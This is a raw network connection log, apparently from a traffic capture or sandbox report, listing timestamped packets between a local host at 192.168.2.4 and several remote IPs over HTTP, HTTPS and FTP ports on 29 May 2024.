May 29, 2024 14:25:15.974600077 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.974864960 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.976175070 CEST	21	49747	93.95.225.137	192.168.2.4
May 29, 2024 14:25:15.976249933 CEST	49747	21	192.168.2.4	93.95.225.137
May 29, 2024 14:25:15.976394892 CEST	49748	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.976428032 CEST	443	49748	173.222.162.32	192.168.2.4
May 29, 2024 14:25:15.976473093 CEST	49748	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.976769924 CEST	49748	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.976790905 CEST	443	49748	173.222.162.32	192.168.2.4
May 29, 2024 14:25:15.976939917 CEST	443	49748	173.222.162.32	192.168.2.4
May 29, 2024 14:25:15.977245092 CEST	49749	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.977272034 CEST	443	49749	173.222.162.32	192.168.2.4
May 29, 2024 14:25:15.977327108 CEST	49749	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.978589058 CEST	49749	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:15.978602886 CEST	443	49749	173.222.162.32	192.168.2.4
May 29, 2024 14:25:15.979880095 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:16.991348028 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:16.991430998 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:16.993777990 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:16.993788958 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:16.994152069 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:16.994489908 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.036494970 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.196094990 CEST	49672	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:17.196135044 CEST	443	49672	173.222.162.32	192.168.2.4
May 29, 2024 14:25:17.654573917 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.654752016 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.654772997 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.654784918 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.654792070 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.654803991 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.654828072 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.974286079 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974313021 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974325895 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974365950 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974379063 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974391937 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974390984 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.974405050 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974419117 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974425077 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.974432945 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974437952 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.974450111 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.974457979 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.974492073 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:17.979329109 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.979352951 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.979365110 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:17.979410887 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.203205109 CEST	443	49749	173.222.162.32	192.168.2.4
May 29, 2024 14:25:18.203298092 CEST	443	49749	173.222.162.32	192.168.2.4
May 29, 2024 14:25:18.203336954 CEST	49749	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:18.203351974 CEST	443	49749	173.222.162.32	192.168.2.4
May 29, 2024 14:25:18.203363895 CEST	49749	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:18.203670979 CEST	49751	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.203702927 CEST	443	49751	173.222.162.51	192.168.2.4
May 29, 2024 14:25:18.203928947 CEST	49751	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.204054117 CEST	49751	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.204063892 CEST	443	49751	173.222.162.51	192.168.2.4
May 29, 2024 14:25:18.204179049 CEST	443	49751	173.222.162.51	192.168.2.4
May 29, 2024 14:25:18.204706907 CEST	49752	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.204725027 CEST	443	49752	173.222.162.51	192.168.2.4
May 29, 2024 14:25:18.204828978 CEST	49752	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.205130100 CEST	49752	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:18.205146074 CEST	443	49752	173.222.162.51	192.168.2.4
May 29, 2024 14:25:18.260579109 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260649920 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260662079 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260672092 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260703087 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.260745049 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.260893106 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260977983 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260987997 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.260998964 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261022091 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.261048079 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.261523008 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261534929 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261552095 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261562109 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261568069 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.261574984 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.261823893 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.262357950 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.262368917 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.262379885 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.262392044 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.262403965 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.262425900 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.262479067 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.263221025 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.263231993 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.263242006 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.263253927 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.263264894 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.263288975 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.263312101 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.265592098 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.265609980 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.265670061 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546439886 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546469927 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546483040 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546494961 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546506882 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546514988 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546545982 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546578884 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546606064 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546622992 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546637058 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546649933 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546667099 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546694994 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546710968 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546715021 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546729088 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546731949 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.546735048 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.546780109 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547193050 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547218084 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547239065 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547259092 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547281027 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547298908 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547405005 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547418118 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547429085 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547439098 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547446966 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547456026 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547468901 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547472000 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547480106 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547493935 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.547512054 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.547540903 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548105001 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548130035 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548145056 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548177958 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548207998 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548238039 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548405886 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548461914 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548480034 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548491955 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548496962 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548511028 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548535109 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548856974 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548902035 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.548906088 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548919916 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.548947096 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.549026012 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549037933 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549046993 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549057007 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549068928 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549078941 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.549079895 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549098015 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549105883 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.549107075 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549124956 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.549140930 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.549597979 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549609900 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.549638987 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.635230064 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.635263920 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.635307074 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836302996 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836325884 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836379051 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836378098 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836393118 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836431026 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836560965 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836571932 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836580992 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836591005 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836599112 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836602926 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836615086 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836626053 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836633921 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836637020 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836647987 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836658955 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836658955 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836668968 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836671114 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836684942 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836695910 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836723089 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836776018 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836894989 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836905956 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836915016 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836925983 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836935997 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836945057 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836946011 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836952925 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836971998 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836976051 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.836987972 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.836994886 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837006092 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837016106 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837028980 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837039948 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837048054 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.837053061 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837089062 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837090969 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.837172985 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.837776899 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837800026 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837837934 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.837862015 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837872982 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837883949 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837893963 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.837954044 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838006020 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838033915 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838044882 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838056087 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838073015 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838077068 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838088989 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838099003 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838109970 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838115931 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838128090 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838135004 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838144064 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838154078 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838167906 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838192940 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838704109 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838728905 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838747025 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838758945 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838790894 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838819027 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838834047 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838862896 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838891029 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838901997 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838912964 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838917971 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838953972 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.838963032 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838984013 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.838996887 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839015961 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839015961 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.839030027 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839042902 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839080095 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.839735031 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839746952 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839757919 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839792967 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839796066 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.839806080 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839817047 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.839849949 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.920584917 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920607090 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920659065 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920700073 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920711040 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920737982 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920748949 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920793056 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.920793056 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.920793056 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.920958996 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920984983 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.920993090 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921015978 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921029091 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921104908 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921133041 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921144009 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921168089 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921175957 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921207905 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921250105 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921260118 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921298027 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921334028 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921344995 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921371937 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921454906 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921466112 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921474934 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921484947 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921494007 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921503067 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921524048 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.921700001 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921711922 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:18.921739101 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:18.964052916 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117047071 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117079020 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117089033 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117098093 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117109060 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117116928 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117136955 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117151976 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117166996 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117177963 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117187023 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117196083 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117208004 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117219925 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117238045 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117248058 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117259026 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117284060 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117295980 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117300987 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117300987 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117300987 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117300987 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117312908 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117340088 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117350101 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117360115 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117403030 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117403030 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117403030 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117463112 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117474079 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117516041 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117527962 CEST	80	49746	111.90.158.40	192.168.2.4
